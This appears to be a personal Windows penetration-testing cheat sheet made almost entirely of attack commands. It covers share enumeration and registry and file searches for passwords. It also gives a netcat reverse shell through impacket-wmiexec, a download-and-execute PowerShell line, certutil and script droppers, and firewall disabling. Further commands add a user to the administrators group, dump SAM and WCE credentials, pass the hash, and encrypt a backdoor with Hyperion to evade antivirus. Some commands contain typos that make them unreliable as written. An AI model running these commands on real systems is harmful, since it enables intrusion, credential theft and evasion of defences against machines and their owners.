• enum4linux - script gather information about a window server
  • smbmap - List available shares
  • Find window servers on SUBNET - nbtscan -r SUBNET
  • Basic Info - whoami /all && ipconfig /all && netstat -an && net user && net accounts && net localgroup administrators && net share
  • Test the Guest account

null session

pre server 2003 server and pre xp sp2
rpcclient -U "" Ipaddress
Blank Password

rpcclient Commands


net use
net use \\host\IPC$ /u:”” “”


accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators

Search common files and registry

iconv -f utf-16le -t utf-8 < win.reg convert reg dump to readable format

dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config
type c:\sysprep.inf
type c:\sysprep.xml
unattend.xml / Unattended.xml (passwords remove in workstation, password is on servers)

# The command below will search the file system for file names containing certain keywords. You can
specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*

# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt

# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s

Common Command reference

systeminfo | findstr /B /C: - collect OS info
schtasks /query /fo LIST /v - Scheduled tasks
tasklist /SVC - running processes
taskkill /F /PID - kill process
clip - send output to clipboard
cacls - file poermissions (XP / Win7)
dir /r - List alternate data streams
whoami /priv - list all priv
nltest /DCLIST:[domain] - List Domain Controllers
regedit /e FILENAME dump registry (in UTF-16 format)

net commands

net localgroup group_name UserLoginName /add
net user USERNAME - user info
net group "Domain Admins" /domain
net localgroup administrators /domain


netsh advfirewall firewall add rule name="###" dir=in action=allow protocol=TCP localport=###
netsh advfirewall firewall add rule name="###" dir=in action=allow program="SOMETHING.EXE" enable=yes
netsh advfirewall set allprofiles state off


I want to mention WMIC (Windows Management Instrumentation Command-Line) separately as it is Windows most useful command line tool. WIMIC can be very practical for information gathering and post-exploitation. That being said it is a bit clunky and the output leaves much to be desired for.

  • XP did not allow access to WMIC from a low privileged account
  • Windows 7 Professional and Windows 8 Enterprise allowed low privilege users by default

Windows wmic command line command

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic useraccount get /all /format:csv - Get all Local Windows Accounts

impacket-wmiexec testuser:testuser@ "c:\nc.exe 443 -e cmd.exe"

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

CLI Service Management

sc - cmd service management tool

  • start / stop service
    sc stop SERVICE
    sc start SERVICE

    sc query - list service
    sc queryex SERVICENAME - extented serive information

# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler

[SC] QueryServiceConfig SUCCESS

        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        LOAD_ORDER_GROUP   : SpoolerGroup
        TAG                : 0
        DISPLAY_NAME       : Print Spooler
        DEPENDENCIES       : RPCSS
                           : http
        SERVICE_START_NAME : LocalSystem

sc config SERVICE_NAME binpath=bin - change service binary path


echo COMMAND | powershell -ExecutionPolicy Bypass -NoLogo -NoProfile - - run command not interfactivly

  • Get File or directory permission - Get-ACL {FILE|DIRECTORY} | Fl *
  • Display file - Get-Content {FILENAME}
  • Encode file
    $RevShell = Get-Content ./FILENAME - Raw
    $bytes = [System.Test.Encoding]::Unicode.GetBytes($RevShell)
    $Encoded | Out-File NEWFILE.ps1.b64
  • Decode file $Decode = [System.text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))
  • ZIP Decompress - Add-Type -Assembly '';[io.compression.zipfile]::ExtractToDirectory("c:\ZIPFILE", 'c:\destination\')
  • List NTFS File stream - Get-Item -Stream * PATH
  • Read NTFS file stream - Get-Content FILENAME -Stream 'STREAMNAME'
  • Set Credentials, run command as user -
    $user = "administrator"; $pw = 'password'; secpw = ConvertTo-SecureString $pw -AsPlainText; $credentail = New-Object System.Management.Automation.PSCredential $user, $secpw
    Invoke-Command -ComputerName COMPUTER -Credential $cred -ScriptBlock { command }
  • download powershell and execute via http - IEX(New-ObjectNet.WebClient).downloadString('URL'))
  • Get auto login password - Get-RegistryAutoLogon
  • Mount share - New-PSDrive -Name "LOCALNAME" -PSProvider "FileSystem" -Root "UCSPATH"
    • To Access - cd LOCALNAME:
  • Set-DomainObjectOwner -Identity DESTUSER -OwnerIdentity SOURCEUSER
  • Add-DomainObjectAcl -TargetIdenttity DESTUSER -PrincipalIdentity SOURCEUSER -Rights ResetPassword -Verbose
  • Set-DomainUserPassword USER -AccountPassword SECURESTRING -Verbose
  • get DLL Version -
    $file = Get-Item .\FILE.dll

Windows File transfer

  • tftp was installed by default on windows versions before XP / 2003, dont forget -i on binary files
    • atftpd --daemon --no-fork -v --logfile - /usr/share/windows-binaries/
  • VBscript, utilize script in artifacts directory. Acts like wget (copy in ~/scripts)
  • certutil -urlcache -split -f URL DESTINATIONLOCATION


  • required interactive shell, won't work normally on a netcat shell
  • you can use the -s: option to specify file with the list of commands to be executed by the client
USER offsec
GET nc.exe

File Transfer - Powershell

Paste the following script into the target host adjusting the url to the location of the tool(s), acts as http client

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Run Script - powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -File wget.ps1

  • Encode a PS command to Base64 to avoid escaping quotations
    echo -n PHERSHELLCOMMAND | iconv --to-code UTF-16LE | base64 -w 0
    powershell -EncodedCommand sdfadsfadsfads


var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("nc_%s.exe");


  • debug.exe is an assembler, disassembler, hex dump tool in 32 bit windows
  • 64k size limit on file it can create


  • Compress file upx -9 filename created Windows PE binary
  • convert binary to text wine exe2bin.exe file.exe file.txt
  • paste contents for txt file into shell


smbclient //server/Temp mypasswd_here -W domain -u username - connect to share
smbclient -I IP ADDRESS -L DOMAIN -N -U

impacket local SMB server



  • pyinstaller module can be used to make a exe file from a python script
  • icacls used to show windows file permissions

Priv Escalation

windows xp

at 01:58 /interactive cmd.exe - use at to spawn a shell as SYSTEM

Add user to admin group

  • Following C code will add a user to the local admins group on a Windows host
  • should be compured using a windows cross compiler
#include <stdlib.h>
int main () 
  int i; 
  i = system("net localgroup administrators lowprivuser /add");
  return 0;



Password Dumping

  • Passwords stored in the SAM (Security Account Manager)
  • SYSKEY used to encrypt SAM
  • Two hashed
    • LAN Manager (LM) - DES
    • NT LAN Manager (NTLM) - MD4

LM is Weak

  • Passwords longer then 7 Characters split into 2 and can be cracked seperatly
  • Converted to UPPERCASE
  • Does not include a salt
  • LM disavled Vista onwards
  • 'AAD3B435B51404EEAAD3B435B51404EE' blank hash


  • Case Sensative
  • suppports all Unicode characters
  • does not limit to 7 chars
  • still not salted

usually displayed in LM:NTLM format

SAM files in XP

Main files locates into
Need both to crack hashes

Backups located in


pwdump and fgdump are used to dump the SAM out of memory.
The SAM files are exclusivly locked in the file system by the OS.



fgdump/pwdump6 | Foofus.Net

Windows Credentials Editor (WCE)

What is WCE?

  • Tool to manipulate Windows logon sessions–Add, list, delete, modify
  • Obtain credentials associated with logon sessions
    Pass-the-hash (NTLM)
  • Pass-the-ticket (Kerberos)


  • Windows XP
  • Windows 2003
  • Windows Vista
  • Windows 7
  • Windows 2008

Amplia Security - Research - Windows Credentials Editor (WCE)

wce.exe -w

VNC Passwoird

Value: Password

Value: Password or PasswordViewOnly

Value: Password

C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2

Read More: Crack or Decrypt VNC Server Encrypted Password • Raymond.CC


Pass the Hash

  • Fixed or harder in In 8.1 and above
  1. Set the SMBHASH environment variable

    root@kali:~# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
  2. run pth-winexe

root@kali:~# pth-winexe -U administrator% // cmd 
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH... 
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.dw

AV avoidance

  • Can test payloads against
  • Methods
    • Encoding Payloads using msfvenom
    • Using binary crypters like Hyperion (windows)
    • Writing your own, or using lesser known examples

Hyperion Example

root@kali:~# cp shell\_reverse\_msf\_encoded\_embedded.exe backdoor.exe 
root@kali:~# cp /usr/share/windows-binaries/ . 
root@kali:~# unzip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe 
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1- win32/libgcc\_s\_sjlj-1.dll .  
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++- 6.dll .  
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe


GitHub - ankh2054/python-exploits: Repository for python exploits

# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.

C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated


Post exploitation frameworks